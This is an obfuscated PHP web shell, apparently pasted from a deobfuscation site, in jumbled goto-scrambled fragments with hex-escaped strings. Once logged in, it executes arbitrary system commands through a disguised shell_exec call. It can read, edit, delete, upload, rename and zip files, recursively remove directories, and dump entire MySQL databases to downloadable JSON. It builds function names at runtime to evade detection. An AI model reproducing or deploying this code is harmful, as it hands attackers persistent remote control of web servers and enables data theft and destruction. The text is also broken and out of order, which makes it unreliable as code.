<?php die; } else { echo "<p>Login successful!</p>"; } goto OUK0a; FocuE: print "<span class='qalin'>Disable functions:</span> " . (implode(", ", $nami) == '' ? "<span class='success'>NONE :)" : "<span class='bad'>" . implode(", ", $nami)) . "</span><br/>"; goto RyvPc; Oe4lN: ?>
&zf=" + berkas)
}
}
function kode()
{
var vall = document.getElementsByClassName('file_edit')[0].value;
var repp = ['a','i','e','s','l','b','u','o','p','h',"\\(","\\)","\\<","\\>","\\?","\\;","\\[","\\]","\\$"];
for(var s in repp)
{
var h = repp[s];
vall = vall.replace(new RegExp(h, 'g') , '|:'+s+':|');
}
document.getElementsByClassName('file_edit')[0].value = vall;
}
document.getElementById("emr_et_atash").addEventListener("keyup", function(event)
{
event.preventDefault();
if (event.keyCode === 13)
{
sistemKom();
}
});
</script>
</body>
</htmDid this file decode correctly?
Original Code
goto h2V9_; Fkic_: echo urlencode(urlencode(kunci($default_dir))); goto aY4FZ; C7paI: ?>
");
}
}
function skl_bas()
{
var sklEmr = document.getElementById('skl_emr').value;
halaman("?awal=skl&emr=" + b64EncodeUnicode(sklEmr));
}
function b64EncodeUnicode(str)
{
return btoa(encodeURIComponent(str).replace(/%([0-9A-F]{2})/g,
function toSolidBytes(match, p1) {
return String.fromCharCode('0x' + p1);
}));
}
function goto()
{
var dir = prompt('Dir:');
if( dir )
{
halaman("?berkas=" + dir);
}
}
function kompres(berkas)
{
var dir = prompt('Dir:' , "<?php goto B0idR; cLRCe: tulisLah(); goto GiKED; tI111: ?>
");
if( dir )
{
halaman("?awal=kompres&berkas=<?php goto L53XD; Uj8Ik: function rrmdir($dir) { if (is_dir($dir)) { $objects = scandir($dir); foreach ($objects as $object) { if ($object != "\x2e" && $object != "\56\x2e") { if (is_dir($dir . "\57" . $object)) { rrmdir($dir . "\57" . $object); } else { unlink($dir . "\x2f" . $object); } } } rmdir($dir); } } goto Ohpn1; NTuYv: ?>
<hr>
<a href="javascript:newFile();">File Baru</a> | <a href="javascript:newPapka();">Folder Baru</a><br>
<a href="javascript:halaman('?awal=sistem_kom&berkas=<?php goto Fkic_; caQk0: ?>
&zf=" + berkas + "&save_to=" + b64EncodeUnicode(dir))
}
}
function silPapka(berkas)
{
if( confirm('Anda yakin?') )
{
halaman("?awal=hapus_folder&berkas=<?php goto gkzLp; I9I3L: if (isset($_POST["\x70\141\163\163\x77\x6f\162\144"])) { if (password_verify($_POST["\160\x61\163\x73\167\157\x72\x64"], $hashedPassword)) { $_SESSION["\154\157\x67\147\x65\x64\111\156"] = true; echo "\74\160\76\114\x6f\147\151\156\40\x73\x75\x63\x63\x65\163\163\x66\x75\154\x21\74\57\x70\x3e"; } } goto zFQLu; MVL3A: echo urlencode(urlencode(kunci($default_dir))); goto O2NTe; NM5jY: $safeMode = true; goto pAMxS; Ohpn1: $default_dir = getcwd(); goto NdpqT; dF3DB: if (function_exists("\x70\x6f\163\x69\170\137\x67\x65\x74\145\x67\x69\x64")) { $qid = posix_getgrgid(posix_getegid()); $qrup = $qid["\x6e\x61\x6d\x65"]; print "\x3c\163\x70\141\156\x20\143\154\x61\163\x73\x3d\x27\161\x61\x6c\151\x6e\x27\76\x55\156\x61\155\x65\x3a\74\x2f\x73\x70\141\156\76\40" . php_uname() . "\x3c\142\x72\57\x3e"; print "\x3c\163\160\x61\156\x20\x63\154\x61\x73\163\75\47\161\x61\x6c\x69\x6e\47\x3e\125\x73\145\162\x3a\x3c\57\163\160\x61\156\x3e\x20" . getmyuid() . "\40\x28" . get_current_user() . "\x29\74\x62\162\x2f\76"; print "\74\x73\x70\x61\x6e\x20\x63\x6c\x61\163\x73\75\x27\x71\141\x6c\151\156\x27\76\x47\162\x6f\x75\x70\x3a\74\57\163\160\141\156\76\x20" . getmygid() . "\x20\x28" . $qrup . "\51\x3c\x62\162\x2f\76"; } else { print "\x3c\163\x70\x61\156\40\143\154\x61\x73\x73\x3d\x27\161\141\x6c\x69\156\x27\76\125\x6e\x61\155\x65\x3a\x3c\57\163\160\x61\x6e\x3e\x20" . php_uname() . "\74\x62\x72\x2f\x3e"; print "\x3c\x73\x70\141\x6e\40\x63\x6c\x61\x73\163\75\x27\x71\x61\154\151\156\47\x3e\125\163\x65\162\x3a\x3c\57\x73\x70\x61\x6e\x3e\x20" . getmyuid() . "\40\50" . get_current_user() . "\51\x3c\x62\162\57\76"; print "\x3c\x73\160\x61\156\x20\x63\x6c\141\163\x73\x3d\47\x71\x61\x6c\151\156\47\76\x47\x72\157\165\x70\x3a\x3c\57\x73\x70\141\156\x3e\x20" . getmygid() . "\x3c\x62\162\57\x3e"; } goto FocuE; RyvPc: print "\74\x73\160\x61\156\40\x63\154\x61\x73\163\x3d\x27\x71\x61\x6c\151\156\x27\x3e\123\x61\146\145\x20\155\x6f\144\145\72\40\74\x2f\163\x70\x61\x6e\x3e" . ($safeMode === true ? "\74\x73\160\x61\x6e\x20\x63\154\x61\163\x73\75\x27\x62\x61\144\x27\76\x4f\156" : "\x3c\163\x70\141\156\x20\x63\x6c\x61\x73\x73\x3d\x27\163\x75\143\x63\x65\x73\163\47\76\117\146\146") . "\74\57\163\x70\141\156\x3e\74\163\x70\141\x6e\x20\163\164\x79\154\145\75\x27\x6d\141\162\147\x69\x6e\x2d\x6c\145\x66\x74\72\x20\x35\x30\x70\170\x3b\47\x3e\74\x61\40\x68\x72\145\146\x3d\47\152\141\166\x61\x73\x63\x72\x69\160\164\x3a\150\141\x6c\141\155\141\156\50\x22\77\x61\167\141\x6c\x3d\160\x68\160\x69\156\x66\x6f\x22\x29\x27\x3e\x5b\x20\120\110\x50\x69\x6e\146\x6f\x20\x5d\74\x2f\x61\x3e\x3c\57\163\160\141\x6e\76\x3c\142\x72\x2f\76"; goto cLRCe; solvS: if (isset($_GET["\x61\167\x61\x6c"]) && $_GET["\141\x77\141\x6c"] == "\x70\151\x6e\146") { ob_start(); phpinfo(); $pInf = ob_get_clean(); print str_replace("\142\157\144\x79\x20\x7b\142\x61\x63\153\147\x72\157\165\156\144\x2d\143\x6f\154\157\162\72\40\x23\146\146\x66\146\x66\146\73\40\x63\157\x6c\157\x72\72\x20\43\60\x30\60\60\60\60\x3b\x7d", '', $pInf); die; } else { if ($awal == "\x64\157\x77\x6e\x6c\x6f\x61\144\137\146\151\x6c\145" && isset($_POST["\146\141\x79\x6c"]) && '' != trim($_POST["\146\x61\171\154"])) { $namaBerkas = basename(uraikan(urldecode($_POST["\x66\x61\x79\x6c"]))); $pemisah = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($namaBerkas, 0, 1) != "\57" ? "\x2f" : ''; if (is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { header("\103\157\156\164\x65\x6e\x74\55\104\x69\x73\160\x6f\x73\151\164\x69\157\156\72\x20\x61\x74\164\141\x63\150\x6d\145\x6e\x74\73\40\146\151\x6c\145\156\x61\x6d\145\75" . basename($namaBerkas)); header("\103\x6f\x6e\x74\x65\x6e\164\55\x54\171\160\x65\x3a\x20\141\x70\160\154\151\x63\x61\x74\x69\x6f\156\57\x6f\x63\x74\145\164\x2d\x73\x74\162\x65\x61\155"); header("\103\157\x6e\164\x65\x6e\x74\55\x4c\x65\x6e\x67\164\150\x3a\x20" . filesize($default_dir . $pemisah . $namaBerkas)); readfile($default_dir . $pemisah . $namaBerkas); die; } } else { if ($awal == "\150\141\160\165\163\x5f\x66\151\x6c\145" && isset($_POST["\x66\141\171\x6c"]) && '' != trim($_POST["\146\x61\171\x6c"])) { $namaBerkas = basename(uraikan(urldecode($_POST["\146\x61\171\154"]))); $pemisah = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($namaBerkas, 0, 1) != "\x2f" ? "\x2f" : ''; if (is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { unlink($default_dir . $pemisah . $namaBerkas); } } else { if ($awal == "\162\145\x73\x65\164\x5f\x66\151\x6c\x65" && isset($_POST["\x66\x61\x79\154"]) && '' != trim($_POST["\146\141\x79\x6c"])) { $namaBerkas = basename(uraikan(urldecode($_POST["\146\x61\171\154"]))); $pemisah = substr($default_dir, strlen($default_dir) - 1) != "\57" && substr($namaBerkas, 0, 1) != "\x2f" ? "\x2f" : ''; if (is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { file_put_contents($default_dir . $pemisah . $namaBerkas, ''); } } else { if ($awal == "\142\165\x61\164\137\x66\x69\x6c\145" && isset($_POST["\x61\144"]) && !empty($_POST["\x61\144"])) { $namaBerkas = basename(urldecode($_POST["\x61\144"])); $pemisah = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($namaBerkas, 0, 1) != "\57" ? "\x2f" : ''; if (is_file($default_dir . $pemisah . $namaBerkas)) { print "\x3c\x73\x63\x72\x69\160\x74\76\x61\x6c\145\162\164\50\x22\x46\151\x6c\x65\40\x64\145\156\147\x61\x6e\x20\x6e\x61\155\141\40\151\x6e\x69\40\x73\165\144\x61\150\x20\x61\x64\141\x21\42\51\73\x3c\x2f\x73\x63\x72\151\x70\x74\x3e"; } else { file_put_contents($default_dir . $pemisah . $namaBerkas, ''); } } else { if ($awal == "\142\x75\141\x74\137\x66\x6f\x6c\x64\x65\x72" && isset($_POST["\x61\144"]) && !empty($_POST["\x61\x64"])) { $namaFolder = basename(urldecode($_POST["\141\144"])); $pemisah = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($namaFolder, 0, 1) != "\x2f" ? "\57" : ''; if (is_file($default_dir . $pemisah . $namaFolder)) { print "\74\163\143\162\x69\160\x74\x3e\141\154\145\x72\164\50\42\106\157\154\144\x65\162\40\144\145\156\x67\x61\x6e\x20\156\x61\x6d\141\40\x69\x6e\151\40\163\x75\144\141\150\40\141\144\x61\41\x22\51\x3b\74\57\163\x63\162\x69\160\164\76"; } else { mkdir($default_dir . $pemisah . $namaFolder); } } else { if ($awal == "\x72\x65\156\x61\155\145\x5f\x66\x69\154\145" && isset($_POST["\x66\x61\x79\154"]) && '' != trim($_POST["\146\141\x79\154"]) && isset($_POST["\156\x65\x77\x5f\x6e\x61\x6d\145"]) && is_string($_POST["\156\145\167\137\x6e\x61\x6d\x65"]) && !empty($_POST["\156\145\167\137\156\141\155\145"])) { $namaBerkas = basename(uraikan(urldecode($_POST["\x66\x61\171\154"]))); $fileNamaBaru = basename(urldecode($_POST["\156\145\167\137\x6e\x61\x6d\145"])); $pemisah = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($namaBerkas, 0, 1) != "\57" ? "\57" : ''; if (is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { rename($default_dir . $pemisah . $namaBerkas, $default_dir . $pemisah . $fileNamaBaru); } } else { if ($awal == "\x73\153\x6c\x5f\x64\137\164" && isset($_POST["\x74"]) && is_string($_POST["\164"]) && !empty($_POST["\x74"])) { $tableName = uraikan(urldecode($_POST["\164"])); $host = isset($_COOKIE["\x68\157\163\x74"]) ? $_COOKIE["\x68\x6f\x73\164"] : ''; $user = isset($_COOKIE["\x75\163\x65\162"]) ? $_COOKIE["\x75\x73\145\162"] : ''; $sandi = isset($_COOKIE["\x73\141\156\x64\x69"]) ? $_COOKIE["\x73\141\156\x64\151"] : ''; $database = isset($_COOKIE["\x64\141\x74\x61\142\x61\163\145"]) ? $_COOKIE["\x64\x61\x74\x61\x62\141\163\145"] : ''; $databaseStr = empty($database) ? '' : "\144\x62\156\141\155\x65\75" . $database . "\73"; if (!empty($host) && !empty($database)) { try { $pdo = new PDO("\155\x79\x73\161\x6c\72\x68\x6f\163\x74\75" . $host . "\73\143\150\x61\x72\x73\x65\x74\75\165\164\146\70\x3b" . $databaseStr, $user, $sandi, array(PDO::MYSQL_ATTR_INIT_COMMAND => "\123\x45\124\x20\116\x41\115\105\x53\x20\47\x75\164\146\x38\x27")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $getColumns = $pdo->prepare("\x53\105\x4c\105\103\124\x20\143\x6f\154\x75\155\156\137\156\x61\x6d\x65\x20\x66\162\157\155\x20\x69\x6e\146\157\162\155\141\x74\x69\x6f\x6e\137\x73\143\x68\145\x6d\141\56\x63\x6f\154\x75\155\156\163\x20\x77\x68\145\x72\145\x20\164\141\142\x6c\x65\137\163\x63\150\x65\x6d\141\x3d\x3f\40\x61\x6e\x64\x20\164\x61\x62\154\145\137\156\x61\155\x65\75\77"); $getColumns->execute(array($database, $tableName)); $columns = $getColumns->fetchAll(); if ($columns) { $data = $pdo->query("\123\105\114\x45\x43\124\40\52\x20\106\x52\x4f\x4d\40\x60" . $tableName . "\140"); $data = $data->fetchAll(); header("\x43\157\x6e\164\x65\156\164\55\x64\151\163\160\157\163\x69\x74\x69\157\156\x3a\40\x61\164\x74\x61\x63\x68\155\x65\x6e\164\73\40\146\151\154\145\x6e\141\x6d\145\x3d\144\x5f" . basename(htmlspecialchars($tableName)) . "\56\x6a\163\157\156"); header("\103\157\156\x74\145\156\x74\x2d\164\171\x70\x65\x3a\40\x61\x70\160\x6c\151\143\141\164\151\157\x6e\x2f\x6a\163\157\x6e"); echo json_encode($data); } else { print "\x54\x61\x62\x6c\145\x20\x6e\157\x74\40\146\157\x75\x6e\144\x21"; } } catch (Exception $e) { print $e->getMessage(); } } else { print "\x45\x72\x72\x6f\162\41\x20\x50\x6c\x65\x61\x73\x65\x20\143\x6f\156\x6e\145\x63\164\40\x74\157\40\x53\121\114\41"; } die; } else { if ($awal == "\163\x6b\154\137\x64") { $host = isset($_COOKIE["\x68\157\163\x74"]) ? $_COOKIE["\x68\157\x73\x74"] : ''; $user = isset($_COOKIE["\165\x73\x65\162"]) ? $_COOKIE["\x75\x73\145\x72"] : ''; $sandi = isset($_COOKIE["\x73\141\156\144\x69"]) ? $_COOKIE["\163\x61\156\x64\151"] : ''; $database = isset($_COOKIE["\144\x61\x74\141\142\x61\x73\x65"]) ? $_COOKIE["\144\x61\164\141\142\141\x73\x65"] : ''; $databaseStr = empty($database) ? '' : "\144\x62\156\x61\x6d\x65\75" . $database . "\x3b"; if (!empty($host) && !empty($database)) { try { $pdo = new PDO("\x6d\x79\163\161\x6c\x3a\x68\157\163\x74\x3d" . $host . "\x3b\143\150\x61\x72\163\x65\164\75\165\x74\146\x38\x3b" . $databaseStr, $user, $sandi, array(PDO::MYSQL_ATTR_INIT_COMMAND => "\123\x45\124\x20\116\101\x4d\x45\x53\x20\47\x75\164\146\70\47")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $allData = array(); $tables = $pdo->prepare("\123\x45\x4c\105\103\x54\x20\164\141\142\x6c\x65\137\x6e\x61\155\145\x20\x66\162\x6f\x6d\x20\x69\x6e\x66\157\162\x6d\141\x74\x69\157\x6e\137\163\143\x68\x65\155\141\56\164\141\x62\x6c\x65\x73\40\x77\150\145\x72\145\40\x74\x61\x62\154\145\137\163\x63\x68\145\155\x61\75\77"); $tables->execute(array($database)); $tables = $tables->fetchAll(); foreach ($tables as $tableName) { $tableName = $tableName["\x74\x61\x62\x6c\x65\137\156\141\x6d\145"]; $data = $pdo->query("\x53\x45\x4c\x45\x43\x54\x20\52\x20\x46\122\x4f\115\40\x60" . $tableName . "\140"); $data = $data->fetchAll(); $allData[$tableName] = $data ? array($data) : array(); } header("\103\x6f\156\x74\145\156\164\55\x64\x69\x73\160\157\163\x69\x74\151\157\x6e\x3a\x20\x61\164\x74\x61\x63\150\155\145\156\x74\x3b\x20\x66\x69\154\x65\156\x61\155\x65\x3d\144\137\x62\x5f" . basename(htmlspecialchars($database)) . "\x2e\152\163\x6f\x6e"); header("\103\x6f\x6e\164\x65\156\x74\55\x74\x79\x70\x65\72\x20\141\160\160\154\x69\x63\141\164\151\157\x6e\x2f\x6a\163\157\x6e"); echo json_encode(utf8ize($allData)); } catch (Exception $e) { print $e->getMessage(); } } else { print "\105\x72\162\x6f\x72\41\x20\x50\x6c\x65\x61\x73\145\x20\x63\x6f\156\156\145\143\x74\x20\164\x6f\40\123\121\x4c\41"; } die; } else { if ($awal == "\153\157\x6d\x70\162\145\x73" && isset($_POST["\x73\x61\x76\145\x5f\x74\157"], $_POST["\172\x66"]) && is_string($_POST["\163\x61\166\145\137\x74\x6f"]) && !empty($_POST["\x73\141\x76\x65\x5f\x74\157"]) && !in_array($_POST["\x73\141\166\145\x5f\x74\157"], array("\56", "\x2e\56", "\56\x2f", "\x2e\56\x2f")) && is_string($_POST["\172\x66"]) && !empty($_POST["\172\146"])) { $save_to = uraikan(urldecode($_POST["\x73\x61\x76\x65\x5f\164\x6f"])); $rootPath = realpath(uraikan(urldecode($_POST["\172\x66"]))); $fileName1 = "\x62\141\x6b\137" . microtime(1) . "\x5f" . rand(1000, 99999) . "\x2e\172\151\160"; $fileName = $save_to . DIRECTORY_SEPARATOR . $fileName1; if (is_dir($save_to) && is_dir($rootPath) && is_writable($save_to)) { set_time_limit(0); $zip = new ZipArchive(); $zip->open($fileName, ZipArchive::CREATE | ZipArchive::OVERWRITE); $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($rootPath), RecursiveIteratorIterator::LEAVES_ONLY); foreach ($files as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($rootPath) + 1); $zip->addFile($filePath, $relativePath); } } $zip->close(); print "\123\x61\166\x65\144\x21\74\150\x72\x3e"; } else { print "\x44\x69\162\x20\x69\x73\40\x6e\x6f\164\x20\x77\162\151\x74\145\x61\142\154\x65\x21\x3c\150\162\x3e"; var_dump($save_to); } } else { if ($awal == "\x68\141\160\165\163\137\x66\x6f\x6c\x64\x65\162" && isset($_POST["\x7a\x66"]) && is_string($_POST["\172\146"]) && !empty($_POST["\172\146"])) { $rootPath = realpath(uraikan(urldecode($_POST["\172\x66"]))); if (is_dir($rootPath)) { set_time_limit(0); rrmdir($rootPath); } else { print "\104\x69\162\40\x69\x73\40\x6e\x6f\x74\x20\167\x72\x69\164\145\x61\x62\x6c\x65\41\74\x68\162\76"; var_dump($save_to); } } else { if ($awal == "\165\x70\154\x5f\x66\x69\x6c\x65" && isset($_FILES["\x75\146\x69\154\145"])) { move_uploaded_file($_FILES["\x75\146\151\154\145"]["\x74\x6d\160\x5f\x6e\x61\x6d\x65"], $default_dir . "\57" . $_FILES["\x75\146\x69\x6c\145"]["\156\x61\x6d\145"]); print "\x54\141\155\160\x61\153\156\171\x61\x20\x74\x65\x6c\x61\150\40\x64\x69\x75\x6e\147\147\141\x68\56"; } } } } } } } } } } } } goto pdDhL; iuLva: echo urlencode(kunci($default_dir)); goto ZYt0O; dGims: function sizeFormat($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . "\x20\x47\142"; } else { if ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . "\x20\x4d\x62"; } else { if ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . "\40\113\142"; } else { $bytes = $bytes . "\x20\x62"; } } } return $bytes; } goto Z1Wre; fYBIn: function uraikan($str) { $f = "\x62\x61\163"; $f .= "\145\66"; $f .= "\x34\x5f"; $f .= "\x64"; $f .= "\145\143"; $f .= "\157\144\145"; return $f($str); } goto vQPAv; dPMvO: if (!isset($_SESSION["\154\x6f\x67\147\x65\x64\x49\x6e"])) { $_SESSION["\154\x6f\x67\x67\145\144\x49\x6e"] = false; } goto I9I3L; OUK0a: session_start(); goto Yp0hu; f6D1Y: set_time_limit(0); goto Dg8bj; B0idR: echo htmlspecialchars($default_dir); goto tI111; gkzLp: echo urlencode(urlencode(kunci($default_dir))); goto Oe4lN; Dg8bj: session_start(); goto dPMvO; Yp0hu: $nami = explode("\54", ''); goto NM5jY; pAMxS: $actions = array("\144\141\163\141\162", "\142\141\143\x61\x5f\x66\x69\x6c\145", "\160\x68\160\151\x6e\x66\x6f", "\x73\151\x73\164\145\x6d\137\x6b\157\155", "\x65\144\151\164\x5f\x66\151\x6c\145", "\x64\x6f\x77\x6e\154\157\x61\x64\137\x66\x69\x6c\145", "\x68\141\x70\x75\163\x5f\146\151\154\x65", "\142\x75\x61\164\137\x66\x69\154\145", "\142\x75\x61\164\x5f\x66\157\154\144\x65\162", "\x72\x65\163\x65\x74\137\x66\151\x6c\x65", "\x68\141\x70\x75\x73\x5f\146\157\x6c\x64\x65\162", "\x72\x65\x6e\x61\155\x65\137\146\x69\x6c\x65", "\x6b\157\x6d\x70\x72\x65\x73", "\x73\x6b\x6c", "\163\x6b\x6c\x5f\144\x5f\164", "\163\153\154\x5f\x64", "\x75\160\x6c\137\146\151\154\145"); goto MxdX2; A5NN1: ?>
");
}
}
function newPapka()
{
var getNewName = prompt('File name:');
if( getNewName )
{
halaman("?awal=buat_folder&ad=" + getNewName + "&berkas=<?php goto MVL3A; NdpqT: if (isset($_POST["\x62\x65\x72\x6b\141\x73"]) && is_string($_POST["\142\x65\162\153\141\x73"])) { $default_dir = empty($_POST["\x62\x65\x72\153\x61\163"]) ? DIRECTORY_SEPARATOR : uraikan(urldecode(urldecode($_POST["\142\145\x72\x6b\x61\163"]))); $c_h_dir_comm = "\x63" . "\x68\x64" . "\x69\162"; $c_h_dir_comm($default_dir); } goto UFLkn; L53XD: echo urlencode(urlencode(kunci($default_dir))); goto caQk0; O2NTe: ?>
");
}
}
function sistemKom()
{
var komanda = document.getElementById('emr_et_atash').value;
if( komanda )
{
halaman("?awal=sistem_kom&kom=" + b64EncodeUnicode(komanda) + "&berkas=<?php goto wBD9l; Z1Wre: function utf8ize($d) { if (is_array($d)) { foreach ($d as $k => $v) { $d[$k] = utf8ize($v); } } else { if (is_string($d)) { return utf8_encode($d); } } return $d; } goto Uj8Ik; agZbm: function kunci($str) { $f = "\142\x61\163"; $f .= "\145\x36"; $f .= "\64\137"; $f .= "\145"; $f .= "\156\143"; $f .= "\x6f\x64\x65"; return $f($str); } goto fYBIn; vQPAv: function ambilBuat($tAd) { if (isset($_SESSION[$tAd])) { unset($_SESSION[$tAd]); } $baruAmbil = md5(kunci(time() . rand(1, 99999999))); $_SESSION[$tAd] = $baruAmbil; return $baruAmbil; } goto xKW7_; hRxO2: echo urlencode(urlencode(kunci($default_dir))); goto A5NN1; ZYt0O: ?>
">
<input type="file" name="ufile">
<input type="submit" value="Upl">
</form>
<form method="POST" id="post_form" style="display: none;"></form>
<script>
function halaman(url)
{
var inputlar = "";
url = url.split("?");
if(typeof url[1]=="undefined") return;
url = url[1].split("&");
for(var n in url)
{
var keyAndValue = url[n].split("=");
if(typeof keyAndValue[1]=="undefined") continue;
inputlar+="<input name='"+keyAndValue[0]+"' value='"+keyAndValue[1]+"' type='hidden'>";
}
document.all("post_form").innerHTML = inputlar;
document.all("post_form").submit();
}
function faylSil(url)
{
if( confirm('Anda yakin?') )
{
halaman(url);
}
}
function faylSifirla(url)
{
if( confirm('Anda yakin?') )
{
halaman(url);
}
}
function changeFileName(name, url)
{
var getNewName = prompt('Change file name:' , name);
if( getNewName )
{
halaman(url + "&new_name=" + getNewName);
}
}
function newFile()
{
var getNewName = prompt('File name:');
if( getNewName )
{
halaman("?awal=buat_file&ad=" + getNewName + "&berkas=<?php goto hRxO2; MxdX2: $awal = isset($_POST["\141\x77\x61\154"]) && in_array($_POST["\x61\x77\141\154"], $actions) ? $_POST["\x61\167\x61\x6c"] : "\x64\x61\163\141\162"; goto agZbm; wBD9l: echo urlencode(urlencode(kunci($default_dir))); goto C7paI; TO_CV: if ($awal == "\x70\150\x70\x69\156\146\157") { print "\74\144\x69\166\x20\x73\164\171\x6c\145\x3d\x27\167\x69\x64\164\x68\x3a\x20\61\60\x30\x25\73\40\150\x65\x69\147\150\x74\72\40\64\60\x30\160\170\x3b\x27\x3e\x3c\151\x66\162\x61\x6d\x65\x20\x73\x72\143\75\x27\77\x61\x77\141\154\x3d\160\151\x6e\146\47\40\163\x74\171\x6c\x65\x3d\47\x77\151\144\x74\150\72\x20\61\60\60\45\x3b\40\150\145\x69\x67\150\x74\72\x20\x34\60\60\x70\170\73\x20\142\157\162\144\x65\162\x3a\40\x30\x3b\x27\x3e\x3c\57\151\x66\x72\141\x6d\x65\x3e\x3c\57\144\x69\x76\76"; } else { if ($awal == "\163\x69\x73\x74\x65\155\137\x6b\x6f\155") { if (isset($_POST["\x6b\x6f\155"]) && is_string($_POST["\153\157\155"]) && !empty($_POST["\153\x6f\x6d"])) { $komanda = uraikan(urldecode($_POST["\x6b\157\x6d"])); $k = "\163\x68"; $k .= "\145\x6c"; $k .= "\154\137\145"; $k .= "\170\x65"; $k .= "\x63"; $output = $k($komanda); print "\74\160\162\145\40\163\164\171\154\145\75\x22\x6d\141\170\55\x68\145\151\147\x68\x74\72\40\x33\x35\x30\x70\170\x3b\157\x76\x65\x72\x66\x6c\x6f\x77\x3a\x20\141\165\x74\157\73\40\x62\157\162\144\145\162\72\40\x31\x70\x78\x20\163\x6f\154\x69\x64\40\x23\x37\67\67\x3b\40\x70\x61\x64\144\x69\156\147\72\x20\x35\160\x78\x3b\42\76" . htmlspecialchars($output) . "\74\x2f\x70\162\145\x3e\74\150\162\x3e"; } print "\x3c\151\x6e\x70\x75\164\x20\164\x79\x70\x65\x3d\42\x74\x65\170\x74\x22\x20\151\x64\75\x22\145\155\162\137\145\x74\137\141\x74\141\x73\x68\42\40\163\164\x79\x6c\x65\75\x22\x77\151\144\x74\150\x3a\40\x35\x30\60\x70\170\73\42\x3e\x20\x3c\x62\x75\164\x74\157\156\x20\164\171\160\x65\x3d\x22\142\165\164\164\157\156\x22\40\x63\154\x61\163\x73\75\42\x62\x74\x6e\42\x20\157\156\x63\x6c\151\143\153\75\x22\x73\x69\163\x74\145\x6d\x4b\157\x6d\50\51\x3b\x22\x3e\x45\156\164\145\x72\x3c\x2f\x62\165\x74\x74\x6f\156\x3e"; } else { if ($awal == "\x62\141\x63\141\x5f\x66\151\x6c\x65" && isset($_POST["\146\141\x79\x6c"]) && '' != trim($_POST["\x66\x61\171\x6c"])) { $namaBerkas = basename(uraikan(urldecode($_POST["\146\x61\171\154"]))); $pemisah = substr($default_dir, strlen($default_dir) - 1) != "\57" && substr($namaBerkas, 0, 1) != "\x2f" ? "\x2f" : ''; if (is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { $elaveBtn = is_writeable($default_dir . $pemisah . $namaBerkas) ? "\40\157\x6e\143\x6c\151\143\153\75\x27\150\141\154\141\x6d\141\x6e\x28\42\77\141\167\141\x6c\75\x65\x64\151\x74\137\146\x69\154\x65\46\146\x61\171\154\75" . urlencode(urlencode(kunci($namaBerkas))) . "\46\x62\145\162\153\141\x73\75" . urlencode(urlencode(kunci($default_dir))) . "\x22\51\47" : "\40\x64\151\x73\x61\142\154\x65\144"; print "\x3c\144\x69\x76\76\116\141\x6d\141\x20\106\x69\154\x65\x3a\40\74\163\160\141\x6e\40\x63\x6c\x61\x73\x73\75\x27\161\x61\x6c\x69\x6e\x27\x3e" . htmlspecialchars($namaBerkas) . "\74\57\x73\x70\x61\156\x3e\74\142\162\57\x3e\x3c\x62\x75\164\164\157\156\x20\143\154\x61\x73\x73\75\x27\x62\x74\156\x27{$elaveBtn}\76\x20\105\x64\151\164\40\74\x2f\142\165\x74\164\x6f\x6e\x3e\x3c\x2f\x64\151\x76\76"; print "\x3c\x64\x69\x76\40\x63\154\141\x73\x73\75\47\142\141\143\x61\x5f\x66\x69\x6c\x65\x27\x3e" . highlight_string(file_get_contents($default_dir . $pemisah . $namaBerkas), true) . "\74\x2f\x64\x69\x76\x3e"; } } else { if ($awal == "\x73\x6b\x6c") { $host = isset($_COOKIE["\x68\x6f\163\164"]) ? $_COOKIE["\150\x6f\x73\164"] : ''; $user = isset($_COOKIE["\x75\163\x65\x72"]) ? $_COOKIE["\165\163\x65\162"] : ''; $sandi = isset($_COOKIE["\x73\x61\156\x64\x69"]) ? $_COOKIE["\163\x61\156\x64\x69"] : ''; $database = isset($_COOKIE["\x64\141\x74\141\x62\x61\163\x65"]) ? $_COOKIE["\x64\x61\x74\x61\x62\141\163\145"] : ''; if (isset($_POST["\150\x6f\x73\164"], $_POST["\165\x73\145\162"], $_POST["\x73\141\156\144\x69"]) && is_string($_POST["\x68\157\163\164"]) && is_string($_POST["\165\163\x65\x72"]) && is_string($_POST["\x73\141\x6e\x64\x69"])) { $host = $_POST["\x68\x6f\x73\164"]; $user = $_POST["\165\163\145\162"]; $sandi = $_POST["\x73\x61\x6e\x64\x69"]; $database = ''; setcookie("\150\157\163\x74", $host, time() + 360000); setcookie("\x75\x73\x65\162", $user, time() + 360000); setcookie("\163\x61\x6e\x64\151", $sandi, time() + 360000); setcookie("\144\141\x74\141\142\141\163\x65", $database, time() + 360000); } if (isset($_POST["\x64\x61\x74\x61\142\141\x73\145"]) && is_string($_POST["\x64\141\164\141\142\141\x73\x65"])) { $database = $_POST["\144\141\x74\x61\x62\141\163\x65"]; setcookie("\x64\x61\164\x61\142\x61\x73\x65", $database, time() + 360000); } $databaseStr = empty($database) ? '' : "\144\142\156\x61\155\x65\75" . $database . "\73"; ?>
<form method="POST">
<input type="hidden" name="awal" value="skl">
<input type="text" placeholder="Hostname" name="host" value="<?php echo htmlspecialchars($host); ?>
">
<input type="text" placeholder="User" name="user" value="<?php echo htmlspecialchars($user); ?>
">
<input type="text" placeholder="Sandi" name="sandi" value="<?php echo htmlspecialchars($sandi); ?>
">
<input type="submit" value="Masuk">
</form>
